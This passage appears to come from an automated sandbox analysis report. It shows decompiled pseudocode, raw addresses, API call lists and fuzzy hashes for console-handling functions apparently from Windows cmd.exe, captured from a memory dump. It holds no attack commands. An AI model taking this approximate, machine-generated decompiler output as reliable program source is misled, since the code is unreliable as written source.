						_pop(_t85);
						L16:
						return E4A5513A9(_t21, _t72, _v8 ^ _t91, _t84, _t85, _t87);
					}
					_push(_t72);
					E4A55185A(0x4a588640, 0x2000, GetCommandLineW());
					_t86 = 0x4a575260;
					E4A552C56(0x104, _t84, 0x4a575260, 0x4a575260, 0x104, 0);
					E4A5586C9(0x104, 0x4a575260, 0x4a588640);
					_t60 = 0x4a588640;
					_t7 = _t60 + 2; // 0x4a588642
					_t80 = _t7;
					do {
						_t84 =  *_t60;
						_t60 = _t60 + 2;
					} while (_t84 != 0);
					_t88 = _v76;
					E4A558B31(0x104, 0x4a575260, _t88, _a8, 0x4a588640, _t60 - _t80 >> 1);
					if( *0x4a575260 == 0x5c) {
						__eflags =  *0x4a575262 - 0x5c;
						if( *0x4a575262 != 0x5c) {
							goto L7;
						}
						__eflags =  *0x4a5906b0;
						if( *0x4a5906b0 != 0) {
							goto L7;
						}
						E4A556D44(_t80, 0x400023c8, 1, 0x4a575260);
						_t92 = _t92 + 0xc;
						_t70 = GetWindowsDirectoryW(0x4a575260, 0x104);
						_push(1);
						__eflags = _t70;
						if(_t70 == 0) {
							goto L29;
						}
						_push(0x4a575260);
						E4A556C78();
					}
					L7:
					_t65 = GetConsoleOutputCP();
					 *0x4a5741b8 = _t65;
					GetCPInfo(_t65, 0x4a574260);
					E4A5588D9();
					_t86 = 0;
					_t35 = HeapAlloc(GetProcessHeap(), 0, 0x20c);
					 *0x4a5741a8 = _t35;
					if(_t35 == 0) {
						goto L9;
					}
					_t35 = GetConsoleTitleW(_t35, 0x104);
					if(_t35 == 0) {
						goto L30;
					}
					goto L9;
				}
			}




























                                0x4a5584eb
                                0x4a5584f2
                                0x4a5584fa
                                0x4a5584fd
                                0x4a558500
                                0x4a5669ff
                                0x00000000
                                0x4a558506
                                0x4a55850c
                                0x4a558511
                                0x4a558517
                                0x4a558523
                                0x4a558529
                                0x4a55852e
                                0x4a558537
                                0x4a55853c
                                0x4a558542
                                0x4a558544
                                0x4a558544
                                0x4a558547
                                0x4a558547
                                0x4a55854b
                                0x4a55854c
                                0x4a558555
                                0x4a558557
                                0x4a55855e
                                0x4a566a06
                                0x4a566a08
                                0x4a566a0d
                                0x4a566a14
                                0x4a566a16
                                0x4a566a16
                                0x4a566a1b
                                0x4a566a1b
                                0x4a566a21
                                0x4a558605
                                0x4a558605
                                0x4a55860b
                                0x4a560944
                                0x4a560949
                                0x4a56094b
                                0x00000000
                                0x00000000
                                0x4a560951
                                0x4a560958
                                0x4a560988
                                0x4a56098f
                                0x4a560990
                                0x00000000
                                0x4a560990
                                0x4a560967
                                0x4a56096d
                                0x4a56096f
                                0x4a560971
                                0x4a560975
                                0x4a560975
                                0x4a56097b
                                0x4a560982
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a560982
                                0x4a558611
                                0x4a558614
                                0x4a566a34
                                0x4a566a3c
                                0x4a566a4c
                                0x4a566a56
                                0x4a566a57
                                0x4a566a5f
                                0x4a566a61
                                0x4a566a79
                                0x4a566a7c
                                0x4a566a82
                                0x4a566a63
                                0x4a566a69
                                0x4a566a6e
                                0x4a566a6f
                                0x4a566a74
                                0x4a566a84
                                0x4a566a8a
                                0x4a566a91
                                0x4a566a97
                                0x4a566a9e
                                0x4a566aa4
                                0x4a566aa5
                                0x4a566aaa
                                0x4a566ab0
                                0x4a566a9e
                                0x4a566a91
                                0x4a55861f
                                0x4a558625
                                0x4a558631
                                0x4a558643
                                0x4a558655
                                0x4a55865c
                                0x4a558661
                                0x4a558664
                                0x4a558667
                                0x4a558679
                                0x4a566ab6
                                0x4a566ab6
                                0x4a566ab6
                                0x4a55867a
                                0x4a55867b
                                0x4a558687
                                0x4a558687
                                0x4a558564
                                0x4a55856f
                                0x4a55857c
                                0x4a558582
                                0x4a558587
                                0x4a55858c
                                0x4a55858e
                                0x4a55858e
                                0x4a558591
                                0x4a558591
                                0x4a558595
                                0x4a558596
                                0x4a5585a4
                                0x4a5585a8
                                0x4a5585b5
                                0x4a55c16f
                                0x4a55c177
                                0x00000000
                                0x00000000
                                0x4a55c17d
                                0x4a55c184
                                0x00000000
                                0x00000000
                                0x4a55c192
                                0x4a55c197
                                0x4a55c19c
                                0x4a55c1a2
                                0x4a55c1a4
                                0x4a55c1a6
                                0x00000000
                                0x00000000
                                0x4a55c1ac
                                0x4a55c1ad
                                0x4a55c1ad
                                0x4a5585bb
                                0x4a5585bb
                                0x4a5585c7
                                0x4a5585cc
                                0x4a5585d2
                                0x4a5585dc
                                0x4a5585e6
                                0x4a5585ec
                                0x4a5585f3
                                0x00000000
                                0x00000000
                                0x4a5585f7
                                0x4a5585ff
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5585ff

                                APIs
                                • InitializeCriticalSection.KERNEL32(4A574220,00000001), ref: 4A558511
                                  • Part of subcall function 4A551E6C: EnterCriticalSection.KERNEL32(4A55851C), ref: 4A551E72
                                  • Part of subcall function 4A551E6C: LeaveCriticalSection.KERNEL32(?,4A551DBC,?,00000021,-00000003,4A588640,4A574210,00000000,00000000,?,4A551CE6,4A588640,4A574210,4A574210,?,4A551C8D), ref: 4A551E85
                                • SetConsoleCtrlHandler.KERNEL32(4A56E72A,00000001), ref: 4A558523
                                  • Part of subcall function 4A551605: _get_osfhandle.MSVCRT ref: 4A551618
                                  • Part of subcall function 4A551605: SetConsoleMode.KERNEL32 ref: 4A551622
                                  • Part of subcall function 4A551605: _get_osfhandle.MSVCRT ref: 4A55162B
                                  • Part of subcall function 4A551605: GetConsoleMode.KERNEL32 ref: 4A551635
                                  • Part of subcall function 4A551605: _get_osfhandle.MSVCRT ref: 4A551652
                                  • Part of subcall function 4A551605: GetConsoleMode.KERNEL32 ref: 4A551656
                                  • Part of subcall function 4A557E13: RegOpenKeyExW.KERNEL32 ref: 4A557EA4
                                  • Part of subcall function 4A557E13: RegQueryValueExW.KERNEL32(?,DisableUNCCheck,00000000,?,?,?), ref: 4A557EDF
                                  • Part of subcall function 4A557E13: RegQueryValueExW.KERNEL32(?,EnableExtensions,00000000,00000001,?,?), ref: 4A557F10
                                  • Part of subcall function 4A557E13: RegQueryValueExW.KERNEL32(?,DelayedExpansion,00000000,00000001,?,?), ref: 4A557F58
                                  • Part of subcall function 4A557E13: RegQueryValueExW.KERNEL32(?,DefaultColor,00000000,00000001,?,?), ref: 4A557F89
                                • GetCommandLineW.KERNEL32(4A574210,00000003), ref: 4A558542
                                • GetCommandLineW.KERNEL32(00000000,?), ref: 4A558565
                                • GetConsoleOutputCP.KERNEL32 ref: 4A5585BB
                                • GetCPInfo.KERNEL32(00000000,4A574260), ref: 4A5585CC
                                • GetProcessHeap.KERNEL32(00000000,0000020C), ref: 4A5585DF
                                • HeapAlloc.KERNEL32(00000000), ref: 4A5585E6
                                • GetConsoleTitleW.KERNEL32 ref: 4A5585F7
                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 4A55861F
                                • GetProcAddress.KERNEL32(00000000,CopyFileExW), ref: 4A558636
                                • GetProcAddress.KERNEL32(IsDebuggerPresent), ref: 4A558648
                                • GetProcAddress.KERNEL32(SetConsoleInputExeNameW), ref: 4A55865A
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Console$QueryValue$AddressCriticalModeProcSection_get_osfhandle$CommandHeapLine$AllocCtrlEnterHandleHandlerInfoInitializeLeaveModuleOpenOutputProcessTitle
                                • String ID: %WINDOWS_COPYRIGHT%$CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                • API String ID: 4158127395-2796496087
                                • Opcode ID: cde7f330b9d028eaa2091ad88824a090dfea4d115da5107f05ce692535b6d4d7
                                • Instruction ID: 349bb51535bbf360887da80d8d7cf4713c7c5d850114d3e7870b8c6362a31528
                                • Opcode Fuzzy Hash: cde7f330b9d028eaa2091ad88824a090dfea4d115da5107f05ce692535b6d4d7
                                • Instruction Fuzzy Hash: 2C71DEB4901201EAE701BBB1CF08A6A3EBCEF96314F05481BF505EA95EEB708D40DB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A552070, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 123COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp$EnvironmentVariable
                                • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                • API String ID: 198002717-2301591722
                                • Opcode ID: 35b69106f1f5e45cfdfe5c70c5d385d1e20d9bba90306805a572c976ffd023fc
                                • Instruction ID: 4262f98b9287f31986ab614cd9711e22803f51217b606b2c3a9a30e83e2a11b5
                                • Opcode Fuzzy Hash: 35b69106f1f5e45cfdfe5c70c5d385d1e20d9bba90306805a572c976ffd023fc
                                • Instruction Fuzzy Hash: 8B31D6725192027AEB141A75EF04E5E3FACEF963B4B10042BF509E84ACEB31D900C768
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5597CA, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 181COMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E4A5597CA(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12, void* _a16) {
				long _v8;
				void* _v12;
				long _v16;
				char _v20;
				short _v28;
				short _v32;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v44;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t57;
				long _t60;
				signed int _t64;
				long _t69;
				signed int _t73;
				intOrPtr* _t74;
				signed short _t89;
				int _t98;
				char* _t103;
				signed char _t104;
				void* _t106;
				signed int _t112;
				intOrPtr _t113;
				void* _t114;
				long _t117;

				_t106 = __edx;
				_push(_t114);
				if(E4A554490(_t57, _a8) != 0) {
					__imp___get_osfhandle(_a8);
					__ebx = __eax;
					__eax =  &_v44;
					if(GetConsoleScreenBufferInfo(__ebx,  &_v44) == 0) {
						goto L20;
					} else {
						_v28 = _v28 - _v32;
						__eax = _v28 - _v32 - 1;
						_v12 = _v28 - _v32 - 1;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t117 = E4A5598A5(_t106, _a4, E4A5525B8, _a12, _a16);
				_a12 = _t117;
				_a16 = 0x4a584640;
				if(_t117 == 0) {
					L14:
					if(_v8 != 0) {
						if(_a8 != 2) {
							goto L15;
						} else {
							_push(1);
							E4A5572E9(_t114, _t117);
							asm("int3");
							_t56 = _t103 - 0x20; // 0x4a5741f0
							_t64 = (_t56 >> 5) + 1;
							_t104 = _t103 + _t64 * 0xffffffe0;
							return  *(0x4a57487c + _t64 * 4) & 1 << _t104;
						}
					}
					L15:
					_t60 = _v8;
				} else {
					_t114 = SetConsoleMode;
					do {
						if(0 == 0) {
							_t103 =  &_v20;
							if(E4A55453E(_t117 + _t117, _a8, _a16, _t117 + _t117, _t103) == 0) {
								L21:
								_t69 = GetLastError();
								_v8 = _t69;
								goto L14;
							} else {
								if(_v20 == _t117 + _t117) {
									goto L12;
								} else {
									goto L21;
								}
							}
						} else {
							if( *0x4a5906a4 != 0) {
								_t73 =  *0x4a590924; // 0x0
								if(_t73 < _v12) {
									L26:
									_t74 = _a16;
									_t103 = _t74 + _a12 * 2;
									while(_t74 < _t103) {
										_t112 =  *0x4a590924; // 0x0
										if(_t112 < _v12) {
											_t113 =  *_t74;
											_t74 = _t74 + 2;
											if(_t113 == 0xa) {
												 *0x4a590924 =  *0x4a590924 + 1;
											}
											continue;
										}
										break;
									}
									_t117 = _t74 - _a16 >> 1;
									goto L11;
								} else {
									 *0x4a590924 =  *0x4a590924 & 0x00000000;
									if(GetConsoleScreenBufferInfo(0,  &_v44) == 0 || WriteConsoleW(0,  *0x4a590920,  *0x4a59091c,  &_v8, 0) == 0) {
										goto L26;
									} else {
										FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
										GetConsoleMode(0,  &_v16);
										_t89 = SetConsoleMode(0, 0);
										__imp___getch();
										SetConsoleMode(0, _v16);
										GetConsoleScreenBufferInfo(0,  &_v68);
										_push( &_v8);
										_push(_v44.dwCursorPosition);
										_push(E4A56FD20( &_v44,  &_v68));
										_push(0x20);
										_push(0);
										FillConsoleOutputCharacterW();
										_t98 = SetConsoleCursorPosition(0, _v44.dwCursorPosition);
										if((_t89 & 0x0000ffff) == 3) {
											E4A56E702(_t98);
											_t60 = 0;
										} else {
											goto L26;
										}
									}
								}
							} else {
								_t117 = 0xa0;
								if(_a12 <= 0xa0) {
									_t117 = _a12;
								}
								L11:
								if(WriteConsoleW(0, _a16, _t117,  &_v8, 0) == 0) {
									_v8 = GetLastError();
								} else {
									L12:
									_v8 = _v8 & 0x00000000;
								}
								goto L13;
							}
						}
						goto L16;
						L13:
						_t22 =  &_a12;
						 *_t22 = _a12 - _t117;
						_a16 = _a16 + _t117 * 2;
					} while ( *_t22 != 0);
					goto L14;
				}
				L16:
				return _t60;
				goto L38;
			}





























                                0x4a5597ca
                                0x4a5597d4
                                0x4a5597df
                                0x4a5597e8
                                0x4a5597ee
                                0x4a5597f1
                                0x4a5597fe
                                0x00000000
                                0x4a559804
                                0x4a55980c
                                0x4a55980e
                                0x4a55980f
                                0x4a55980f
                                0x4a5597fe
                                0x4a559815
                                0x4a559829
                                0x4a55982b
                                0x4a55982e
                                0x4a559837
                                0x4a55988c
                                0x4a559890
                                0x4a569a26
                                0x00000000
                                0x4a569a2c
                                0x4a569a2c
                                0x4a569a2e
                                0x4a569a33
                                0x4a569a34
                                0x4a569a3a
                                0x4a569a40
                                0x00000000
                                0x4a55472c
                                0x4a569a26
                                0x4a559896
                                0x4a559896
                                0x4a559839
                                0x4a559839
                                0x4a55983f
                                0x4a559841
                                0x4a5599a5
                                0x4a5599ba
                                0x4a5599d1
                                0x4a5599d1
                                0x4a569a1a
                                0x00000000
                                0x4a5599bc
                                0x4a5599c2
                                0x00000000
                                0x4a5599c8
                                0x00000000
                                0x4a5599c8
                                0x4a5599c2
                                0x4a559847
                                0x4a55984e
                                0x4a56991d
                                0x4a569925
                                0x4a5699c9
                                0x4a5699c9
                                0x4a5699cf
                                0x4a5699f0
                                0x4a5699d4
                                0x4a5699dd
                                0x4a5699df
                                0x4a5699e3
                                0x4a5699e8
                                0x4a5699ea
                                0x4a5699ea
                                0x00000000
                                0x4a5699e8
                                0x00000000
                                0x4a5699dd
                                0x4a5699f9
                                0x00000000
                                0x4a56992b
                                0x4a56992b
                                0x4a56993f
                                0x00000000
                                0x4a569962
                                0x4a56996b
                                0x4a569976
                                0x4a56997f
                                0x4a569981
                                0x4a56998e
                                0x4a569995
                                0x4a56999e
                                0x4a56999f
                                0x4a5699af
                                0x4a5699b0
                                0x4a5699b2
                                0x4a5699b3
                                0x4a5699bd
                                0x4a5699c7
                                0x4a569a0e
                                0x4a569a13
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5699c7
                                0x4a56993f
                                0x4a559854
                                0x4a559854
                                0x4a55985c
                                0x4a55985e
                                0x4a55985e
                                0x4a559861
                                0x4a559874
                                0x4a569a06
                                0x4a55987a
                                0x4a55987a
                                0x4a55987a
                                0x4a55987a
                                0x00000000
                                0x4a559874
                                0x4a55984e
                                0x00000000
                                0x4a55987e
                                0x4a55987e
                                0x4a55987e
                                0x4a559887
                                0x4a559887
                                0x00000000
                                0x4a55983f
                                0x4a559899
                                0x4a55989d
                                0x00000000

                                APIs
                                  • Part of subcall function 4A554490: _get_osfhandle.MSVCRT ref: 4A55449A
                                  • Part of subcall function 4A554490: GetFileType.KERNEL32 ref: 4A5544A9
                                • _get_osfhandle.MSVCRT ref: 4A5597E8
                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A5597F6
                                • GetLastError.KERNEL32(4A565268,4A584640,00000000,?,0000233A,4A5525B8,?,?,?,?,?,?,hRVJ:#,4A556D61,?,00000002), ref: 4A5599D1
                                  • Part of subcall function 4A5598A5: FormatMessageW.KERNEL32(00001A00,00000000,0000013D,00000000,4A584640,00002000,00000000,00000000,766F14B9,00000000), ref: 4A5598EC
                                  • Part of subcall function 4A5598A5: FormatMessageW.KERNEL32(00001800,00000000,0000013D,00000000,4A584640,00002000,?,4A584640,00000025), ref: 4A559943
                                • WriteConsoleW.KERNEL32 ref: 4A55986C
                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A569937
                                • WriteConsoleW.KERNEL32 ref: 4A569958
                                • GetStdHandle.KERNEL32(000000F6,?,?,?,?,hRVJ:#,4A556D61,?,00000002,hRVJ:#,00000000), ref: 4A569964
                                • FlushConsoleInputBuffer.KERNEL32(00000000), ref: 4A56996B
                                • GetConsoleMode.KERNEL32 ref: 4A569976
                                • SetConsoleMode.KERNEL32 ref: 4A56997F
                                • _getch.MSVCRT ref: 4A569981
                                • SetConsoleMode.KERNEL32 ref: 4A56998E
                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A569995
                                • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000000,4A556D61,00000000), ref: 4A5699B3
                                • SetConsoleCursorPosition.KERNEL32 ref: 4A5699BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Console$Buffer$InfoModeScreen$FormatMessageWrite_get_osfhandle$CharacterCursorErrorFileFillFlushHandleInputLastOutputPositionType_getch
                                • String ID: @FXJ$hRVJ:#
                                • API String ID: 3481465048-3600751071
                                • Opcode ID: 2594e824e976b76e0af60dae755df5e18a0b6cd2dab5036e2b069d57440ccf2f
                                • Instruction ID: 97fc1128245c5f6dae07446cdf65cfb435a8f392d17a5ded616f306be5df7f84
                                • Opcode Fuzzy Hash: 2594e824e976b76e0af60dae755df5e18a0b6cd2dab5036e2b069d57440ccf2f
                                • Instruction Fuzzy Hash: 1A614AB290120AEFDB10AFA0CB84AAE7BBDFF45315F114516F906E6458D734DE50CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56FE1B, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 219COMMON
                                Download Yara Rule
                                C-Code - Quality: 49%
                                			E4A56FE1B(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				long _v40;
				char _v41;
				char _v42;
				char _v43;
				long _v48;
				signed int _v52;
				long _v56;
				void* _v60;
				void* _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _v80;
				void* __esi;
				signed int _t57;
				void* _t60;
				intOrPtr* _t63;
				void* _t69;
				void* _t71;
				void* _t73;
				wchar_t* _t76;
				signed int _t79;
				intOrPtr* _t82;
				signed short _t94;
				intOrPtr* _t100;
				void* _t112;
				void* _t115;
				intOrPtr _t119;
				void* _t123;
				void _t129;
				void* _t131;
				void* _t132;
				void* _t133;
				void* _t135;
				signed int _t138;
				signed int _t139;
				void* _t140;

				_t133 = __edi;
				_t131 = __edx;
				_t117 = __ecx;
				_t115 = __ebx;
				_t57 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t57 ^ _t139;
				_t59 = _a4;
				_v52 = _v52 & 0x00000000;
				_v68 = _a4;
				_v43 = 0;
				_v41 = 0;
				if(_a8 != 0x400023d3) {
					L5:
					_push(_a12);
					_t60 = E4A55C56B(_t117);
					_t135 = _t60;
					if(_t135 == 0) {
						L10:
						E4A55185A( &_v40, 0x10, L"NY");
						goto L11;
					} else {
						_t10 = _t60 + 2; // 0x2
						_t132 = _t10;
						do {
							_t129 =  *_t60;
							_t60 = _t60 + 2;
						} while (_t129 != 0);
						if(_t60 - _t132 >> 1 >= 0x10) {
							goto L10;
						}
						E4A55185A( &_v40, 0x10, _t135);
						__imp___wcsupr( &_v40);
						L11:
						_t63 =  &_v40;
						_t15 = _t63 + 2; // 0x2
						_t131 = _t15;
						do {
							_t119 =  *_t63;
							_t63 = _t63 + 2;
						} while (_t119 != 0);
						_push(_t115);
						_push(_t133);
						_v80 = (_t63 - _t131 >> 1) - 1;
						LocalFree(_t135);
						_t69 = GetStdHandle(0xfffffff5);
						_v64 = _t69;
						if(GetConsoleMode(_t69,  &_v56) != 0) {
							_v43 = 1;
							SetConsoleMode(_v64, _v56 | 0x00000001);
						}
						_t71 = GetStdHandle(0xfffffff6);
						_t121 =  &_v72;
						_v60 = _t71;
						if(GetConsoleMode(_t71,  &_v72) != 0) {
							_v41 = 1;
							SetConsoleMode(_v60, _v72 | 0x00000007);
							_t100 =  *0x4a5741f4; // 0x0
							if(_t100 != 0) {
								 *_t100(L"<noalias>");
							}
						}
						goto L18;
						do {
							do {
								L18:
								_v48 = 0;
								_v42 = 1;
								if(_v68 == 0) {
									_push(0);
									_push(_a8);
									_t73 = E4A5599E1(_t121);
									_pop(_t123);
								} else {
									_t73 = E4A5599E1(_t121, _a8, 1, _v68);
									_t140 = _t140 + 0xc;
								}
								if(E4A553B03(_t73, _t123, 0) != 0) {
									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
								}
								while(_v48 != 0xa) {
									_push( &_v76);
									_push(1);
									if(E4A5567D3(GetStdHandle(0xfffffff6),  &_v48) != 0 && _v76 == 1) {
										if(_v42 != 0) {
											_t94 = towupper(_v48);
											_t88 = _t94 & 0x0000ffff;
											_pop(_t123);
											_v52 = _t94 & 0x0000ffff;
											_v42 = 0;
										}
										if(E4A553B03(_t88, _t123, 0) == 0 || ( *0x4a574154 & 0x00000001) == 0) {
											E4A5558F3(0x4a5745b8, _v48 & 0x0000ffff);
											_pop(_t123);
										}
										continue;
									}
									_push(0x4a5745a8);
									_v52 = _v40 & 0x0000ffff;
									E4A5558F3();
									goto L33;
								}
								L33:
								_t76 = wcschr( &_v40, _v52);
								_pop(_t121);
							} while (_t76 == 0);
							_t121 =  &_v40;
							_t138 = _t76 -  &_v40 >> 1;
						} while (_t138 > _v80);
						if(_v43 != 0) {
							SetConsoleMode(_v64, _v56);
						}
						if(_v41 != 0) {
							SetConsoleMode(_v60, _v72);
							_t82 =  *0x4a5741f4; // 0x0
							if(_t82 != 0) {
								 *_t82(L"CMD.EXE");
							}
						}
						_pop(_t133);
						_t79 = _t138;
						_pop(_t115);
						L41:
						return E4A5513A9(_t79, _t115, _v8 ^ _t139, _t131, _t133, _t138);
					}
				}
				_t138 = E4A561F66(_t59, 0);
				if(_t138 == 0xffffffff) {
					goto L5;
				}
				_t112 = E4A553B03(_t111, __ecx, _t138);
				_push(_t138);
				if(_t112 == 0) {
					E4A553AB3();
					goto L5;
				} else {
					E4A553AB3();
					_pop(_t79);
					goto L41;
				}
			}









































                                0x4a56fe1b
                                0x4a56fe1b
                                0x4a56fe1b
                                0x4a56fe1b
                                0x4a56fe23
                                0x4a56fe2a
                                0x4a56fe2d
                                0x4a56fe30
                                0x4a56fe3c
                                0x4a56fe3f
                                0x4a56fe43
                                0x4a56fe47
                                0x4a56fe75
                                0x4a56fe75
                                0x4a56fe78
                                0x4a56fe7d
                                0x4a56fe82
                                0x4a56feb3
                                0x4a56febe
                                0x00000000
                                0x4a56fe84
                                0x4a56fe84
                                0x4a56fe84
                                0x4a56fe87
                                0x4a56fe87
                                0x4a56fe8b
                                0x4a56fe8c
                                0x4a56fe98
                                0x00000000
                                0x00000000
                                0x4a56fea1
                                0x4a56feaa
                                0x4a56fec3
                                0x4a56fec3
                                0x4a56fec6
                                0x4a56fec6
                                0x4a56fec9
                                0x4a56fec9
                                0x4a56fecd
                                0x4a56fece
                                0x4a56fed5
                                0x4a56fed8
                                0x4a56fedb
                                0x4a56fede
                                0x4a56feec
                                0x4a56fef9
                                0x4a56ff06
                                0x4a56ff12
                                0x4a56ff16
                                0x4a56ff16
                                0x4a56ff1a
                                0x4a56ff1c
                                0x4a56ff21
                                0x4a56ff28
                                0x4a56ff34
                                0x4a56ff38
                                0x4a56ff3a
                                0x4a56ff41
                                0x4a56ff48
                                0x4a56ff48
                                0x4a56ff41
                                0x00000000
                                0x4a56ff4a
                                0x4a56ff4a
                                0x4a56ff4a
                                0x4a56ff4c
                                0x4a56ff4f
                                0x4a56ff56
                                0x4a56ff6a
                                0x4a56ff6b
                                0x4a56ff6e
                                0x4a56ff74
                                0x4a56ff58
                                0x4a56ff60
                                0x4a56ff65
                                0x4a56ff65
                                0x4a56ff7d
                                0x4a56ff84
                                0x4a56ff84
                                0x4a56ffe8
                                0x4a56ff8f
                                0x4a56ff90
                                0x4a56ffa2
                                0x4a56ffae
                                0x4a56ffb3
                                0x4a56ffb9
                                0x4a56ffbc
                                0x4a56ffbd
                                0x4a56ffc0
                                0x4a56ffc0
                                0x4a56ffcc
                                0x4a56ffe1
                                0x4a56ffe7
                                0x4a56ffe7
                                0x00000000
                                0x4a56ffcc
                                0x4a56fff5
                                0x4a56fffa
                                0x4a56fffd
                                0x00000000
                                0x4a570002
                                0x4a570003
                                0x4a57000a
                                0x4a570011
                                0x4a570012
                                0x4a57001a
                                0x4a570021
                                0x4a570023
                                0x4a570030
                                0x4a570038
                                0x4a570038
                                0x4a57003e
                                0x4a570046
                                0x4a570048
                                0x4a57004f
                                0x4a570056
                                0x4a570056
                                0x4a57004f
                                0x4a570058
                                0x4a570059
                                0x4a57005b
                                0x4a57005c
                                0x4a570068
                                0x4a570068
                                0x4a56fe82
                                0x4a56fe51
                                0x4a56fe56
                                0x00000000
                                0x00000000
                                0x4a56fe59
                                0x4a56fe5e
                                0x4a56fe61
                                0x4a56fe70
                                0x00000000
                                0x4a56fe63
                                0x4a56fe63
                                0x4a56fe6a
                                0x00000000
                                0x4a56fe6a

                                APIs
                                • _wcsupr.MSVCRT ref: 4A56FEAA
                                • LocalFree.KERNEL32(00000000,4A58C642,00000000,00000000,00000010,4A570080,0000233F,4A551C18,00000000,4A574210,?,00000004,766F5129,00000000), ref: 4A56FEDE
                                • GetStdHandle.KERNEL32(000000F5), ref: 4A56FEEC
                                • GetConsoleMode.KERNEL32 ref: 4A56FEFC
                                • SetConsoleMode.KERNEL32 ref: 4A56FF16
                                • GetStdHandle.KERNEL32(000000F6), ref: 4A56FF1A
                                • GetConsoleMode.KERNEL32 ref: 4A56FF24
                                • SetConsoleMode.KERNEL32 ref: 4A56FF38
                                • GetStdHandle.KERNEL32(000000F6,00000000), ref: 4A56FF81
                                • FlushConsoleInputBuffer.KERNEL32(00000000), ref: 4A56FF84
                                • GetStdHandle.KERNEL32(000000F6,0000000A,00000001,?,00000000), ref: 4A56FF98
                                • towupper.MSVCRT ref: 4A56FFB3
                                • wcschr.MSVCRT ref: 4A57000A
                                • SetConsoleMode.KERNEL32 ref: 4A570038
                                • SetConsoleMode.KERNEL32 ref: 4A570046
                                  • Part of subcall function 4A553B03: _get_osfhandle.MSVCRT ref: 4A553B0D
                                  • Part of subcall function 4A553B03: GetFileType.KERNEL32 ref: 4A553B17
                                  • Part of subcall function 4A553AB3: _close.MSVCRT ref: 4A553AED
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                • String ID: <noalias>$CMD.EXE
                                • API String ID: 2015057810-1690691951
                                • Opcode ID: 9fea6ac3b644b011cdeecf56320008549ad66a9b5960ced2a961e4d02da465e7
                                • Instruction ID: 3dba28793e313a1674d4a561abd5899bedba1dc4f45f9cff8816d30236e29588
                                • Opcode Fuzzy Hash: 9fea6ac3b644b011cdeecf56320008549ad66a9b5960ced2a961e4d02da465e7
                                • Instruction Fuzzy Hash: E5719C71D05219AAEB01EBE8DE44AEEBFF8AF0A324F110116F815F61D5DB70D948CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A553A0A, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 168fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 63%
                                			E4A553A0A(WCHAR* _a4, signed int _a8, long _a12) {
				long _v8;
				signed int _v12;
				void _v16;
				long _v20;
				struct _SECURITY_ATTRIBUTES _v32;
				int _t49;
				long _t51;
				void* _t55;
				void* _t73;
				void* _t77;
				long _t79;

				_t79 = 0;
				_t49 = _a8 & 0x00000003;
				_v32.bInheritHandle = 1;
				_v32.lpSecurityDescriptor = 0;
				_v32.nLength = 0xc;
				if(_t49 > 2) {
					L13:
					return _t49 | 0xffffffff;
				}
				if((_a8 & 1) != 0) {
					if((_a8 & 0x00000008) == 0) {
						goto L2;
					}
					goto L13;
				}
				L2:
				if(_t49 != _t79) {
					_v12 = 0x40000000;
					__imp___wcsicmp(_a4, "con");
					if(_t49 != 0) {
						_a12 = 1;
					}
					_push(2);
				} else {
					_v12 = 0x80000000;
					_push(3);
				}
				_pop(_t51);
				_push(_t79);
				if(_a8 == 0x10a) {
					_t55 = CreateFileW(_a4, _v12 | 0x80000000, _a12,  &_v32, 3, 0x80, ??);
					_t73 = _t55;
					if(_t73 == 0xffffffff) {
						_t55 = CreateFileW(_a4, _v12, _a12,  &_v32, 4, 0x80, 0);
						_t73 = _t55;
